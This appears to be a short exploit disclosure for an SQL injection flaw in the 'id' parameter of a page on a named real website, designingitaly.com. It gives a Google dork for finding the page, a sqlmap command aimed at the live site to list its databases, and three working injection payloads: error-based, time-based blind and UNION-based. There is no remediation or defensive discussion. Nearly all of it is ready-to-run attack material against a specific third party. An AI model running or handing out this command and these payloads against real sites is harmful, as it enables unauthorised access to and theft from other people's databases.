****************************
#Exploit Title: DESIGNINGITALY - SQL Injection vulnerability
#Date: 2020-09-10
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://designingitaly.com
#Google Dork: form.php?id=2
#Tested On: windows 10
sqlmap:
sqlmap -u "http://designingitaly.com/form.php?id=2" --dbs
Testing Method;
- error-based
- AND/OR time-based blind
- UNION query
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2 AND (SELECT 2610 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT (ELT(2610=2610,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: id=-4704 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b7a6271,0x595170717477796e4a42716b6a716d524b746f796f63785547786452794845725a624b6263537346,0x716b7a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vVQD
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************